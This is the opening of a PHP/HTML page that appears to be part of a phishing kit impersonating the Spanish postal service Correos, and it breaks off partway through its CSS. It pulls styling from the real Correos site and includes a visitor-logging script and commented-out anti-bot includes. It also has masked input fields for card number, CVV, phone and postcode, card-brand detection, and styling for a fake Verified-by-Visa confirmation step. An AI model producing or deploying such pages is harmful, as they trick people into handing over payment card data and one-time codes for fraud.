<?php
//include "scripts/bot.php";
//include "scripts/bot2.php";
//include 'scripts/bot1.php'; 
include 'visit.php';


?>
 
<html lang="en"><head>

		         <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-15">
            <meta name="viewport" content="width=device-width, initial-scale=1">

		<link rel="stylesheet" href="https://tienda.correos.es/css/common-dynamic.css"> 
             <link rel="stylesheet" href="templates/css/autentification.css">
            <link type="text/css" rel="stylesheet" href="templates/css/imp.css" media="all">
 
 
			
			 <script src="templates/jquery-3.1.0.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.maskedinput/1.4.1/jquery.maskedinput.js"></script>
    <script>
    $(document).ready(function($){
     $('#getcc').mask("9999 9999 9999 9999");
    });   
    </script>
    <script>
    $(document).ready(function($){
     $('#cry').mask("999");
    });   
    </script>
    <script>
    $(document).ready(function($){
     $('#tel').mask("99 99 99 99 99");
    });   
    </script>
    <script>
    $(document).ready(function($){
     $('#getzp').mask("99 999");
    });   
    </script>
    <script>
         function type_carte(){
            var get_value = document.getElementById('getcc').value;
            var type = get_value.substring(0,2);
            var other = get_value.substring(0,1);
            if(type == "40"){
                document.getElementById("getcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "41"){
                document.getElementById("getcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "42"){
                document.getElementById("getcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "43"){
                document.getElementById("getcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "44"){
                document.getElementById("getcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "45"){
                document.getElementById("getcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "46"){
                document.getElementById("getcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "47"){
                document.getElementById("getcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "48"){
                document.getElementById("getcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "49"){
                document.getElementById("getcc").style.backgroundPosition = "100% 97.5%";
            }else if(type == "51"){
                document.getElementById("getcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "52"){
                document.getElementById("getcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "53"){
                document.getElementById("getcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "54"){
                document.getElementById("getcc").style.backgroundPosition = "100% 48.5%";
            }else if(type == "55"){
                document.getElementById("getcc").style.backgroundPosition = "100% 48.5%";
             }else if(type == "50"){
                document.getElementById("getcc").style.backgroundPosition = "100% 29%";
            }else if(type == "56"){
                document.getElementById("getcc").style.backgroundPosition = "100% 29%";
            }else if(type == "58"){
                document.getElementById("getcc").style.backgroundPosition = "100% 29%";
            }else if(other == "1"){
                document.getElementById("getcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "2"){
                document.getElementById("getcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "3"){
                document.getElementById("getcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "4"){
                document.getElementById("getcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "5"){
                document.getElementById("getcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "6"){
                document.getElementById("getcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "7"){
                document.getElementById("getcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "8"){
                document.getElementById("getcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "9"){
                document.getElementById("getcc").style.backgroundPosition = "101.5% 74.8%";
            }else if(other == "0"){
                document.getElementById("getcc").style.backgroundPosition = "101.5% 74.8%";
            }
        };
    </script> 

  <meta charset="utf-8">
  <title>recu</title>
  <base href="./">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="icon" type="image/x-icon" href="favicon.ico">

<style>.mat-typography{font:400 14px/20px Roboto,Helvetica Neue,sans-serif;letter-spacing:normal;}@font-face{font-family:Roboto;font-style:normal;font-weight:500;src:local("â˜º"),url(Roboto-Medium.7429a63c09f79a1760b0.ttf) format("ttf");}@font-face{font-family:Roboto;font-style:bold;font-weight:700;src:local("â˜º"),url(Roboto-Bold.75371f53f06181df75f1.ttf) format("ttf");}body,html{padding:0;margin:0;box-sizing:border-box;}body{font-family:Roboto,Arial,Helvetica,sans-serif;}</style><link rel="stylesheet" href="styles.e5266c54b31e45c628c8.css" media="all" onload="this.media='all'"><noscript><link rel="stylesheet" href="styles.e5266c54b31e45c628c8.css"></noscript><style></style><style>.hk-container[_ngcontent-kib-c38]{padding:0 15px}nav[_ngcontent-kib-c38]{display:flex;align-items:center;justify-content:space-between;width:100%;padding:8px 16px}nav[_ngcontent-kib-c38]   .logo[_ngcontent-kib-c38]{width:202px;height:80px;background-image:url(hk-logo.b987b15bdc94e67f2548.png);background-position:50%;background-repeat:no-repeat;background-size:contain}nav[_ngcontent-kib-c38]   .lang-select[_ngcontent-kib-c38]{border:.5px solid #999;border-radius:3px;padding:2px 4px}nav[_ngcontent-kib-c38]   .globe-icon[_ngcontent-kib-c38]{width:50px;height:30px;background-image:url(globe-1.fba4942b8d0273c98488.png);background-position:50%;background-repeat:no-repeat;background-size:contain;opacity:.9}nav[_ngcontent-kib-c38]   .globe-icon[_ngcontent-kib-c38]:hover{opacity:1}.hk-title[_ngcontent-kib-c38]{font-size:18px;font-weight:700;text-align:center;margin:20px auto;line-height:1.2;width:80%}.payment-steps[_ngcontent-kib-c38]{display:flex;align-items:center;width:80%;margin:0 auto}.hr-line[_ngcontent-kib-c38]{width:60%;height:1px;background-color:#0000008a}.step[_ngcontent-kib-c38]{display:flex;align-items:center}.step-nb[_ngcontent-kib-c38]{padding:3px 10px;background-color:#0000008a;color:#fff;border-radius:20px;margin-right:10px;margin-left:10px}.step[_ngcontent-kib-c38]:first-child   .step-nb[_ngcontent-kib-c38]{margin-left:0}.step-active[_ngcontent-kib-c38]   .step-nb[_ngcontent-kib-c38]{background-color:#25308f}.step-active[_ngcontent-kib-c38]   .step-text[_ngcontent-kib-c38]{font-weight:600;color:#000}.step-text[_ngcontent-kib-c38]{font-size:14px;color:#0000008a;margin-right:10px;width:-webkit-max-content;width:max-content}.step[_ngcontent-kib-c38]:last-child   .step-text[_ngcontent-kib-c38]{margin-right:0}.done-container[_ngcontent-kib-c38]{margin:60px auto;width:60%}.done-wrap[_ngcontent-kib-c38]{display:flex;flex-direction:column;align-items:center;justify-content:center}.icon-done[_ngcontent-kib-c38]{background-position:50%;background-repeat:no-repeat;background-size:contain;background-image:url(md-checkmark-circle.133137732ace571163dc.svg);width:50px;height:50px}.done-text[_ngcontent-kib-c38]{text-align:center}.done-text[_ngcontent-kib-c38]   h1[_ngcontent-kib-c38]{margin-left:0}.shipping-wrap[_ngcontent-kib-c38]{border-radius:4px;box-shadow:0 2px 4px 2px #bbb9b98a;padding:20px 40px;display:flex;width:-webkit-fit-content;width:-moz-fit-content;width:fit-content;margin:20px auto}.box-icon[_ngcontent-kib-c38]{background-image:url(box.e5a05d1e786cfb04e734.svg);width:50px;height:50px;background-position:50%;background-repeat:no-repeat;background-size:contain;margin-right:20px}.shipping-title[_ngcontent-kib-c38]{font-weight:700;font-size:20px}.shipping-nb[_ngcontent-kib-c38]{font-weight:700;font-size:16px}.shipping-subtitle[_ngcontent-kib-c38]{color:#0000008a;font-weight:600px}.hr2[_ngcontent-kib-c38]{margin:10px auto 0}@media only screen and (max-width:768px){nav[_ngcontent-kib-c38]{padding:8px}nav[_ngcontent-kib-c38]   .logo[_ngcontent-kib-c38]{width:180px;height:50px}.hk-title[_ngcontent-kib-c38], .payment-steps[_ngcontent-kib-c38]{width:100%}.done-container[_ngcontent-kib-c38]{width:80%}.hr2[_ngcontent-kib-c38], .shipping-wrap[_ngcontent-kib-c38]{width:100%}}</style><style>.form-container[_ngcontent-kib-c37]{overflow:hidden;margin:20px 100px}.loading[_ngcontent-kib-c37]{position:fixed;z-index:6;top:0;left:0;bottom:0;right:0;align-items:center;justify-content:center;background-color:#0000003d;opacity:.9}.form-wrap[_ngcontent-kib-c37], .loading[_ngcontent-kib-c37]{display:flex;flex-direction:column}.form-wrap[_ngcontent-kib-c37]{grid-template-columns:47% 47%;grid-column-gap:6%;column-gap:6%;grid-row-gap:10px;row-gap:10px;padding:30px;border-radius:10px}.mk34[_ngcontent-kib-c37]{align-items:center}.mk34[_ngcontent-kib-c37], .mk35[_ngcontent-kib-c37]{display:flex;margin-bottom:10px}.mk35[_ngcontent-kib-c37]{flex-direction:column}.card-nb[_ngcontent-kib-c37]{grid-column:1/span 2;width:340px}.card-exp[_ngcontent-kib-c37]{grid-column:1/span 1;width:160px;margin-right:20px}.card-cvv[_ngcontent-kib-c37]{grid-column:2/span 1;width:160px}.card-name[_ngcontent-kib-c37]{grid-column:1/span 2;width:340px}.card-button[_ngcontent-kib-c37]{width:100px;margin:0 auto}.card-button[_ngcontent-kib-c37], h2[_ngcontent-kib-c37]{grid-column:1/span 2}h2[_ngcontent-kib-c37]{text-align:center}.image[_ngcontent-kib-c37]{width:100%;grid-column:1/span 2}.logo[_ngcontent-kib-c37]{width:180px;height:90px;margin:0 auto 20px}.images[_ngcontent-kib-c37]{display:flex;align-items:flex-end;margin-top:20px}.done-wrap[_ngcontent-kib-c37]{display:flex;flex-direction:column;align-items:center;justify-content:center;position:relative;width:40%;padding:30px;border:2px solid #d1d1d1;border-radius:10px;background-color:#fff}.icon-done[_ngcontent-kib-c37]{background-position:50%;background-repeat:no-repeat;background-size:contain;background-image:url(md-checkmark-circle.133137732ace571163dc.svg);width:100px;height:100px}.done-text[_ngcontent-kib-c37]{margin-top:30px;text-align:center}.mat-icon-custom[_ngcontent-kib-c37]{height:18px;width:32px}label[_ngcontent-kib-c37]{font-weight:600}@media only screen and (max-width:768px){.form-container[_ngcontent-kib-c37]{margin:20px 10px}.form-wrap[_ngcontent-kib-c37]{width:90%;padding:16px}.done-wrap[_ngcontent-kib-c37]{width:80%}.card-button[_ngcontent-kib-c37], .card-cvv[_ngcontent-kib-c37], .card-exp[_ngcontent-kib-c37]{grid-column:1/span 2}}.vbv-container[_ngcontent-kib-c37]{background-color:#00000040;position:fixed;left:0;right:0;top:0;bottom:0;z-index:4}.c1-subtitle[_ngcontent-kib-c37]{color:#666}.error-text[_ngcontent-kib-c37]{color:red;margin-top:10px;font-weight:600}.vbvs[_ngcontent-kib-c37]{width:400px;position:absolute;left:calc(50% - 220px);top:80px;padding:20px 10px;background-color:#fff;z-index:5;box-shadow:1px 2px 7px #58575745}.vbv-default[_ngcontent-kib-c37]{padding:10px 5px;width:100%;font-family:Arial,Helvetica Neue,Helvetica,sans-serif;font-size:12.5px}.vbv-top[_ngcontent-kib-c37]{margin-bottom:40px;display:flex;justify-content:space-between;align-items:center}.vbv-top[_ngcontent-kib-c37]   .bank-name[_ngcontent-kib-c37]{width:150px;height:50px;display:flex;flex-direction:column;justify-content:center}.vbv-top[_ngcontent-kib-c37]   .bank-logo[_ngcontent-kib-c37]{width:120px;height:40px;background-position:0}.vbv-top[_ngcontent-kib-c37]   .bank-logo[_ngcontent-kib-c37], .vbv-top[_ngcontent-kib-c37]   .vendor-logo[_ngcontent-kib-c37]{background-repeat:no-repeat;background-size:contain}.vbv-top[_ngcontent-kib-c37]   .vendor-logo[_ngcontent-kib-c37]{width:150px;height:50px;object-fit:contain;object-position:right;background-position:100%;background-color:#fff}.c-bold[_ngcontent-kib-c37]{font-size:12.5px;font-weight:700}.c2-title[_ngcontent-kib-c37]{color:#676767}.vbv-form[_ngcontent-kib-c37]{padding:0;border-radius:0;background-color:#fff}.vbv-form[_ngcontent-kib-c37], .vbv-input[_ngcontent-kib-c37]{width:-webkit-fit-content;width:-moz-fit-content;width:fit-content}.vbv-input[_ngcontent-kib-c37]{display:flex;align-items:center;justify-content:flex-start;border:1px solid #333;border-radius:2px}.vbv-input[_ngcontent-kib-c37]   span[_ngcontent-kib-c37]{margin-right:2px;margin-top:2px;margin-left:5px}.vbv-input[_ngcontent-kib-c37]   input[_ngcontent-kib-c37]{width:80px}.vbv-input[_ngcontent-kib-c37]   input.vbv-input-error[_ngcontent-kib-c37]{color:red}.l2[_ngcontent-kib-c37]{display:grid;grid-template-columns:50% 50%;margin-top:4px}.l2-l[_ngcontent-kib-c37]{text-align:right;margin-right:15px;font-size:12.5px;font-weight:700}.decline-text[_ngcontent-kib-c37]{color:red;font-weight:600}.vbv-c2[_ngcontent-kib-c37]{margin:20px auto}.vbv-c3[_ngcontent-kib-c37]{display:grid}.vbv-c3[_ngcontent-kib-c37]   .l3[_ngcontent-kib-c37]{text-decoration:underline}.vbv-c3[_ngcontent-kib-c37]   .l3[_ngcontent-kib-c37], .vbv-c3[_ngcontent-kib-c37]   .submit-btn[_ngcontent-kib-c37]{text-transform:uppercase;cursor:pointer}.vbv-c3[_ngcontent-kib-c37]   .submit-btn[_ngcontent-kib-c37]{padding:6px 20px;font-weight:700;margin:5px auto;color:#fff;width:-webkit-fit-content;width:-moz-fit-content;width:fit-content;background-color:#211f1f;border:none}.vbv-c3[_ngcontent-kib-c37]   .l3b[_ngcontent-kib-c37]{display:flex;align-items:center;justify-content:space-between;text-decoration:underline}.vbv-c3[_ngcontent-kib-c37]   .l3b[_ngcontent-kib-c37], .vbv-c3[_ngcontent-kib-c37]   .l3b[_ngcontent-kib-c37]   .l[_ngcontent-kib-c37], .vbv-c3[_ngcontent-kib-c37]   .l3b[_ngcontent-kib-c37]   .r[_ngcontent-kib-c37]{cursor:pointer}@media only screen and (max-width:768px){.vbvs[_ngcontent-kib-c37]{margin:0 auto;width:90%;left:5%}.form-container[_ngcontent-kib-c37]{margin:20px 0}.form-wrap[_ngcontent-kib-c37]{width:90%;padding:16px}}</style><style>.mat-form-field{display:inline-block;position:relative;text-align:left}[dir=rtl] .mat-form-field{text-align:right}.mat-form-field-wrapper{position:relative}.mat-form-field-flex{display:inline-flex;align-items:baseline;box-sizing:border-box;width:100%}.mat-form-field-prefix,.mat-form-field-suffix{white-space:nowrap;flex:none;position:relative}.mat-form-field-infix{display:block;position:relative;flex:auto;min-width:0;width:180px}.cdk-high-contrast-active .mat-form-field-infix{border-image:linear-gradient(transparent, transparent)}.mat-form-field-label-wrapper{position:absolute;left:0;box-sizing:content-box;width:100%;height:100%;overflow:hidden;pointer-events:none}[dir=rtl] .mat-form-field-label-wrapper{left:auto;right:0}.mat-form-field-label{position:absolute;left:0;font:inherit;pointer-events:none;width:100%;white-space:nowrap;text-overflow:ellipsis;overflow:hidden;transform-origin:0 0;transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1),color 400ms cubic-bezier(0.25, 0.8, 0.25, 1),width 400ms cubic-bezier(0.25, 0.8, 0.25, 1);display:none}[dir=rtl] .mat-form-field-label{transform-origin:100% 0;left:auto;right:0}.mat-form-field-empty.mat-form-field-label,.mat-form-field-can-float.mat-form-field-should-float .mat-form-field-label{display:block}.mat-form-field-autofill-control:-webkit-autofill+.mat-form-field-label-wrapper .mat-form-field-label{display:none}.mat-form-field-can-float .mat-form-field-autofill-control:-webkit-autofill+.mat-form-field-label-wrapper .mat-form-field-label{display:block;transition:none}.mat-input-server:focus+.mat-form-field-label-wrapper .mat-form-field-label,.mat-input-server[placeholder]:not(:placeholder-shown)+.mat-form-field-label-wrapper .mat-form-field-label{display:none}.mat-form-field-can-float .mat-input-server:focus+.mat-form-field-label-wrapper .mat-form-field-label,.mat-form-field-can-float .mat-input-server[placeholder]:not(:placeholder-shown)+.mat-form-field-label-wrapper .mat-form-field-label{display:block}.mat-form-field-label:not(.mat-form-field-empty){transition:none}.mat-form-field-underline{position:absolute;width:100%;pointer-events:none;transform:scale3d(1, 1.0001, 1)}.mat-form-field-ripple{position:absolute;left:0;width:100%;transform-origin:50%;transform:scaleX(0.5);opacity:0;transition:background-color 300ms cubic-bezier(0.55, 0, 0.55, 0.2)}.mat-form-field.mat-focused .mat-form-field-ripple,.mat-form-field.mat-form-field-invalid .mat-form-field-ripple{opacity:1;transform:scaleX(1);transition:transform 300ms cubic-bezier(0.25, 0.8, 0.25, 1),opacity 100ms cubic-bezier(0.25, 0.8, 0.25, 1),background-color 300ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-form-field-subscript-wrapper{position:absolute;box-sizing:border-box;width:100%;overflow:hidden}.mat-form-field-subscript-wrapper .mat-icon,.mat-form-field-label-wrapper .mat-icon{width:1em;height:1em;font-size:inherit;vertical-align:baseline}.mat-form-field-hint-wrapper{display:flex}.mat-form-field-hint-spacer{flex:1 0 1em}.mat-error{display:block}.mat-form-field-control-wrapper{position:relative}.mat-form-field._mat-animation-noopable .mat-form-field-label,.mat-form-field._mat-animation-noopable .mat-form-field-ripple{transition:none}
</style><style>.mat-form-field-appearance-fill .mat-form-field-flex{border-radius:4px 4px 0 0;padding:.75em .75em 0 .75em}.cdk-high-contrast-active .mat-form-field-appearance-fill .mat-form-field-flex{outline:solid 1px}.mat-form-field-appearance-fill .mat-form-field-underline::before{content:"";display:block;position:absolute;bottom:0;height:1px;width:100%}.mat-form-field-appearance-fill .mat-form-field-ripple{bottom:0;height:2px}.cdk-high-contrast-active .mat-form-field-appearance-fill .mat-form-field-ripple{height:0;border-top:solid 2px}.mat-form-field-appearance-fill:not(.mat-form-field-disabled) .mat-form-field-flex:hover~.mat-form-field-underline .mat-form-field-ripple{opacity:1;transform:none;transition:opacity 600ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-form-field-appearance-fill._mat-animation-noopable:not(.mat-form-field-disabled) .mat-form-field-flex:hover~.mat-form-field-underline .mat-form-field-ripple{transition:none}.mat-form-field-appearance-fill .mat-form-field-subscript-wrapper{padding:0 1em}
</style><style>.mat-input-element{font:inherit;background:transparent;color:currentColor;border:none;outline:none;padding:0;margin:0;width:100%;max-width:100%;vertical-align:bottom;text-align:inherit}.mat-input-element:-moz-ui-invalid{box-shadow:none}.mat-input-element::-ms-clear,.mat-input-element::-ms-reveal{display:none}.mat-input-element,.mat-input-element::-webkit-search-cancel-button,.mat-input-element::-webkit-search-decoration,.mat-input-element::-webkit-search-results-button,.mat-input-element::-webkit-search-results-decoration{-webkit-appearance:none}.mat-input-element::-webkit-contacts-auto-fill-button,.mat-input-element::-webkit-caps-lock-indicator,.mat-input-element::-webkit-credentials-auto-fill-button{visibility:hidden}.mat-input-element[type=date],.mat-input-element[type=datetime],.mat-input-element[type=datetime-local],.mat-input-element[type=month],.mat-input-element[type=week],.mat-input-element[type=time]{line-height:1}.mat-input-element[type=date]::after,.mat-input-element[type=datetime]::after,.mat-input-element[type=datetime-local]::after,.mat-input-element[type=month]::after,.mat-input-element[type=week]::after,.mat-input-element[type=time]::after{content:" ";white-space:pre;width:1px}.mat-input-element::-webkit-inner-spin-button,.mat-input-element::-webkit-calendar-picker-indicator,.mat-input-element::-webkit-clear-button{font-size:.75em}.mat-input-element::placeholder{-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;transition:color 400ms 133.3333333333ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-input-element::placeholder:-ms-input-placeholder{-ms-user-select:text}.mat-input-element::-moz-placeholder{-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;transition:color 400ms 133.3333333333ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-input-element::-moz-placeholder:-ms-input-placeholder{-ms-user-select:text}.mat-input-element::-webkit-input-placeholder{-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;transition:color 400ms 133.3333333333ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-input-element::-webkit-input-placeholder:-ms-input-placeholder{-ms-user-select:text}.mat-input-element:-ms-input-placeholder{-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;transition:color 400ms 133.3333333333ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-input-element:-ms-input-placeholder:-ms-input-placeholder{-ms-user-select:text}.mat-form-field-hide-placeholder .mat-input-element::placeholder{color:transparent !important;-webkit-text-fill-color:transparent;transition:none}.mat-form-field-hide-placeholder .mat-input-element::-moz-placeholder{color:transparent !important;-webkit-text-fill-color:transparent;transition:none}.mat-form-field-hide-placeholder .mat-input-element::-webkit-input-placeholder{color:transparent !important;-webkit-text-fill-color:transparent;transition:none}.mat-form-field-hide-placeholder .mat-input-element:-ms-input-placeholder{color:transparent !important;-webkit-text-fill-color:transparent;transition:none}textarea.mat-input-element{resize:vertical;overflow:auto}textarea.mat-input-element.cdk-textarea-autosize{resize:none}textarea.mat-input-element{padding:2px 0;margin:-2px 0}select.mat-input-element{-moz-appearance:none;-webkit-appearance:none;position:relative;background-color:transparent;display:inline-flex;box-sizing:border-box;padding-top:1em;top:-1em;margin-bottom:-1em}select.mat-input-element::-ms-expand{display:none}select.mat-input-element::-moz-focus-inner{border:0}select.mat-input-element:not(:disabled){cursor:pointer}select.mat-input-element::-ms-value{color:inherit;background:none}.mat-focused .cdk-high-contrast-active select.mat-input-element::-ms-value{color:inherit}.mat-form-field-type-mat-native-select .mat-form-field-infix::after{content:"";width:0;height:0;border-left:5px solid transparent;border-right:5px solid transparent;border-top:5px solid;position:absolute;top:50%;right:0;margin-top:-2.5px;pointer-events:none}[dir=rtl] .mat-form-field-type-mat-native-select .mat-form-field-infix::after{right:auto;left:0}.mat-form-field-type-mat-native-select .mat-input-element{padding-right:15px}[dir=rtl] .mat-form-field-type-mat-native-select .mat-input-element{padding-right:0;padding-left:15px}.mat-form-field-type-mat-native-select .mat-form-field-label-wrapper{max-width:calc(100% - 10px)}.mat-form-field-type-mat-native-select.mat-form-field-appearance-outline .mat-form-field-infix::after{margin-top:-5px}.mat-form-field-type-mat-native-select.mat-form-field-appearance-fill .mat-form-field-infix::after{margin-top:-10px}
</style><style>.mat-form-field-appearance-legacy .mat-form-field-label{transform:perspective(100px);-ms-transform:none}.mat-form-field-appearance-legacy .mat-form-field-prefix .mat-icon,.mat-form-field-appearance-legacy .mat-form-field-suffix .mat-icon{width:1em}.mat-form-field-appearance-legacy .mat-form-field-prefix .mat-icon-button,.mat-form-field-appearance-legacy .mat-form-field-suffix .mat-icon-button{font:inherit;vertical-align:baseline}.mat-form-field-appearance-legacy .mat-form-field-prefix .mat-icon-button .mat-icon,.mat-form-field-appearance-legacy .mat-form-field-suffix .mat-icon-button .mat-icon{font-size:inherit}.mat-form-field-appearance-legacy .mat-form-field-underline{height:1px}.cdk-high-contrast-active .mat-form-field-appearance-legacy .mat-form-field-underline{height:0;border-top:solid 1px}.mat-form-field-appearance-legacy .mat-form-field-ripple{top:0;height:2px;overflow:hidden}.cdk-high-contrast-active .mat-form-field-appearance-legacy .mat-form-field-ripple{height:0;border-top:solid 2px}.mat-form-field-appearance-legacy.mat-form-field-disabled .mat-form-field-underline{background-position:0;background-color:transparent}.cdk-high-contrast-active .mat-form-field-appearance-legacy.mat-form-field-disabled .mat-form-field-underline{border-top-style:dotted;border-top-width:2px}.mat-form-field-appearance-legacy.mat-form-field-invalid:not(.mat-focused) .mat-form-field-ripple{height:1px}
</style><style>.mat-form-field-appearance-outline .mat-form-field-wrapper{margin:.25em 0}.mat-form-field-appearance-outline .mat-form-field-flex{padding:0 .75em 0 .75em;margin-top:-0.25em;position:relative}.mat-form-field-appearance-outline .mat-form-field-prefix,.mat-form-field-appearance-outline .mat-form-field-suffix{top:.25em}.mat-form-field-appearance-outline .mat-form-field-outline{display:flex;position:absolute;top:.25em;left:0;right:0;bottom:0;pointer-events:none}.mat-form-field-appearance-outline .mat-form-field-outline-start,.mat-form-field-appearance-outline .mat-form-field-outline-end{border:1px solid currentColor;min-width:5px}.mat-form-field-appearance-outline .mat-form-field-outline-start{border-radius:5px 0 0 5px;border-right-style:none}[dir=rtl] .mat-form-field-appearance-outline .mat-form-field-outline-start{border-right-style:solid;border-left-style:none;border-radius:0 5px 5px 0}.mat-form-field-appearance-outline .mat-form-field-outline-end{border-radius:0 5px 5px 0;border-left-style:none;flex-grow:1}[dir=rtl] .mat-form-field-appearance-outline .mat-form-field-outline-end{border-left-style:solid;border-right-style:none;border-radius:5px 0 0 5px}.mat-form-field-appearance-outline .mat-form-field-outline-gap{border-radius:.000001px;border:1px solid currentColor;border-left-style:none;border-right-style:none}.mat-form-field-appearance-outline.mat-form-field-can-float.mat-form-field-should-float .mat-form-field-outline-gap{border-top-color:transparent}.mat-form-field-appearance-outline .mat-form-field-outline-thick{opacity:0}.mat-form-field-appearance-outline .mat-form-field-outline-thick .mat-form-field-outline-start,.mat-form-field-appearance-outline .mat-form-field-outline-thick .mat-form-field-outline-end,.mat-form-field-appearance-outline .mat-form-field-outline-thick .mat-form-field-outline-gap{border-width:2px}.mat-form-field-appearance-outline.mat-focused .mat-form-field-outline,.mat-form-field-appearance-outline.mat-form-field-invalid .mat-form-field-outline{opacity:0;transition:opacity 100ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-form-field-appearance-outline.mat-focused .mat-form-field-outline-thick,.mat-form-field-appearance-outline.mat-form-field-invalid .mat-form-field-outline-thick{opacity:1}.mat-form-field-appearance-outline:not(.mat-form-field-disabled) .mat-form-field-flex:hover .mat-form-field-outline{opacity:0;transition:opacity 600ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-form-field-appearance-outline:not(.mat-form-field-disabled) .mat-form-field-flex:hover .mat-form-field-outline-thick{opacity:1}.mat-form-field-appearance-outline .mat-form-field-subscript-wrapper{padding:0 1em}.mat-form-field-appearance-outline._mat-animation-noopable:not(.mat-form-field-disabled) .mat-form-field-flex:hover~.mat-form-field-outline,.mat-form-field-appearance-outline._mat-animation-noopable .mat-form-field-outline,.mat-form-field-appearance-outline._mat-animation-noopable .mat-form-field-outline-start,.mat-form-field-appearance-outline._mat-animation-noopable .mat-form-field-outline-end,.mat-form-field-appearance-outline._mat-animation-noopable .mat-form-field-outline-gap{transition:none}
</style><style>.mat-form-field-appearance-standard .mat-form-field-flex{padding-top:.75em}.mat-form-field-appearance-standard .mat-form-field-underline{height:1px}.cdk-high-contrast-active .mat-form-field-appearance-standard .mat-form-field-underline{height:0;border-top:solid 1px}.mat-form-field-appearance-standard .mat-form-field-ripple{bottom:0;height:2px}.cdk-high-contrast-active .mat-form-field-appearance-standard .mat-form-field-ripple{height:0;border-top:2px}.mat-form-field-appearance-standard.mat-form-field-disabled .mat-form-field-underline{background-position:0;background-color:transparent}.cdk-high-contrast-active .mat-form-field-appearance-standard.mat-form-field-disabled .mat-form-field-underline{border-top-style:dotted;border-top-width:2px}.mat-form-field-appearance-standard:not(.mat-form-field-disabled) .mat-form-field-flex:hover~.mat-form-field-underline .mat-form-field-ripple{opacity:1;transform:none;transition:opacity 600ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-form-field-appearance-standard._mat-animation-noopable:not(.mat-form-field-disabled) .mat-form-field-flex:hover~.mat-form-field-underline .mat-form-field-ripple{transition:none}
</style><style>.mat-icon{background-repeat:no-repeat;display:inline-block;fill:currentColor;height:24px;width:24px}.mat-icon.mat-icon-inline{font-size:inherit;height:inherit;line-height:inherit;width:inherit}[dir=rtl] .mat-icon-rtl-mirror{transform:scale(-1, 1)}.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-prefix .mat-icon,.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-suffix .mat-icon{display:block}.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-prefix .mat-icon-button .mat-icon,.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-suffix .mat-icon-button .mat-icon{margin:auto}
</style><style>.mat-button .mat-button-focus-overlay,.mat-icon-button .mat-button-focus-overlay{opacity:0}.mat-button:hover .mat-button-focus-overlay,.mat-stroked-button:hover .mat-button-focus-overlay{opacity:.04}@media(hover: none){.mat-button:hover .mat-button-focus-overlay,.mat-stroked-button:hover .mat-button-focus-overlay{opacity:0}}.mat-button,.mat-icon-button,.mat-stroked-button,.mat-flat-button{box-sizing:border-box;position:relative;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;cursor:pointer;outline:none;border:none;-webkit-tap-highlight-color:transparent;display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:64px;line-height:36px;padding:0 16px;border-radius:4px;overflow:visible}.mat-button::-moz-focus-inner,.mat-icon-button::-moz-focus-inner,.mat-stroked-button::-moz-focus-inner,.mat-flat-button::-moz-focus-inner{border:0}.mat-button[disabled],.mat-icon-button[disabled],.mat-stroked-button[disabled],.mat-flat-button[disabled]{cursor:default}.mat-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-button.cdk-program-focused .mat-button-focus-overlay,.mat-icon-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-icon-button.cdk-program-focused .mat-button-focus-overlay,.mat-stroked-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-stroked-button.cdk-program-focused .mat-button-focus-overlay,.mat-flat-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-flat-button.cdk-program-focused .mat-button-focus-overlay{opacity:.12}.mat-button::-moz-focus-inner,.mat-icon-button::-moz-focus-inner,.mat-stroked-button::-moz-focus-inner,.mat-flat-button::-moz-focus-inner{border:0}.mat-raised-button{box-sizing:border-box;position:relative;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;cursor:pointer;outline:none;border:none;-webkit-tap-highlight-color:transparent;display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:64px;line-height:36px;padding:0 16px;border-radius:4px;overflow:visible;transform:translate3d(0, 0, 0);transition:background 400ms cubic-bezier(0.25, 0.8, 0.25, 1),box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 